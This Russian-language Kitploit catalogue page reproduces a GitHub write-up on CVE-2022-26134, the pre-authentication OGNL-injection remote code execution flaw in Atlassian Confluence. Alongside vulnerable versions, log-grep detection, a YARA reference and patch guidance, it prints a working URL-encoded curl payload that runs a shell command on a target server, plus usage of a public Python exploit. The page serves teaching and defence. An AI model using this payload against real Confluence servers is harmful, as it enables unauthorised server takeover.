Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Atlassian_CVE-2022-26134 — Confluence: удаленное выполнение кода до аутентификации через внедрение OGNL (CVE-2022-26134) | Kitploit
Инструменты/GitHubGitHub/muhammad-ali007/atlassian_cve-2022-26134
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubmuhammad-ali007/atlassian_cve-2022-26134

Atlassian_CVE-2022-26134

Confluence: удаленное выполнение кода до аутентификации через внедрение OGNL (CVE-2022-26134)

Репозиторий
3 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)

30 мая 2022 года организация Volexity выявила неаутентифицированную уязвимость удаленного выполнения кода (оценка 9,8 по NIST) в Atlassian Confluence Server и Data Center (https://www.atlassian.com/software/confluence).

Confluence — это фреймворк для совместной работы над документацией и управления проектами для команд. Confluence помогает отслеживать статус проекта, предоставляя централизованное рабочее пространство для участников.

Следующие версии Confluence уязвимы для данного CVE:

  • 1.3.0 -> 7.4.17
  • 7.13.0 -> 7.13.7
  • 7.14.0 -> 7.14.3
  • 7.15.0 -> 7.15.2
  • 7.16.0 -> 7.16.4
  • 7.17.0 -> 7.17.4
  • 7.18.0 -> 7.18.1

Вы можете просмотреть запись NIST для CVE-2022-26134 здесь (https://nvd.nist.gov/vuln/detail/CVE-2022-26134).

Этот CVE использует уязвимость в языке выражений OGNL (Object-Graph Navigation Language) для Java. OGNL используется для получения и установки свойств Java-объектов, среди прочего.

Например, OGNL используется для привязки элементов интерфейса, таких как текстовые поля, к серверным объектам и может применяться в веб-приложениях на Java, таких как Confluence. На скриншоте ниже показано, как используется OGNL. Значения вводятся в веб-форму, где они будут сохранены в объекты приложения.

Эксплуатация Мы можем злоупотребить тем, что OGNL может быть модифицирован; мы можем создать полезную нагрузку для тестирования и проверки эксплойтов.

Чтобы использовать эту уязвимость в OGNL, нам нужно отправить HTTP GET-запрос и поместить нашу полезную нагрузку в URI. Например, мы можем указать среде выполнения Java выполнить команду, например, создать файл на сервере: "${@java.lang.Runtime@getRuntime().exec("touch /tmp/thm/")}/".

Это необходимо закодировать в URL. Вы можете использовать этот сайт для кодирования ваших полезных нагрузок (обратите внимание, что ваша полезная нагрузка curl должна заканчиваться символом /, а не $2F). Команда: user@host~ curl -v http://<target_ip>:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/thm%22%29%7D/ Теперь убедитесь, что приведенная выше команда выполнена успешно, выполнив команду ls /tmp в приведенной выше команде.

Существует несколько рабочих PoC-эксплойтов; я продемонстрирую PoC Сэми Юнси (Mwqda), написанный на Python и размещенный на GitHub (https://github.com/h3v0x/CVE-2022-26134).

  • клонируйте репозиторий
  • перейдите в этот каталог
  • выполните python3 exploit.py -u <target_url> -c <command>

Обнаружение

Файлы журналов Confluence — это сервер Apache Tomcat, журналы которого находятся в /opt/atlassian/confluence/logs. Вы можете использовать такие команды, как grep, для поиска HTTP GET-запросов полезных нагрузок, использующих среду выполнения Java для выполнения команд. Например:

root@kitploit:~
grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" in catalina.out

YARA Если у вас установлен Yara на сервере с Confluence, Volexity (обнаружившие уязвимость) создали правило Yara для вашего использования, которое предоставлено в этом репозитории, а также по следующей ссылке (https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar).

Патчинг Atlassian выпустил уведомление для своих продуктов, затронутых этим CVE, которое вы можете прочитать здесь (https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html). Чтобы устранить проблему, вам необходимо обновить версию Confluence. Рекомендуемый список на момент публикации:

  • 7.4.17
  • 7.13.7
  • 7.14.3
  • 7.15.2
  • 7.16.4
  • 7.17.4
  • 7.18.1

Помните, OGNL — это язык выражений для веб-приложений на Java, поэтому эта уязвимость также будет применима к другим веб-приложениям, использующим те же классы, что и Confluence!

Дополнительные материалы для чтения:

  • Запись в Национальной базе данных уязвимостей NIST (CVE-2022-26134) (https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
  • Охота на RCE в Confluence [CVE-2022–26134] (https://medium.com/@th3b3ginn3r/hunting-for-cve-2022-26134-confluence-rce-on-linux-server-ae9ce0176b4a)
  • Изучение и устранение RCE в Confluence (https://www.datadoghq.com/blog/confluence-vulnerability-overview-and-remediation/)
  • Что такое внедрение OGNL? (https://www.contrastsecurity.com/glossary/ognl-injection-ognl)
  • Citrix: Рекомендации по снижению риска неаутентифицированного внедрения OGNL с RCE (https://www.citrix.com/blogs/2022/06/09/reducing-unauthenticated-ognl-injection-security-vulnerability-risk-cve-2022-26134/)
  • Изучение внедрения OGNL в Apache Struts (https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts)
Скачать инструмент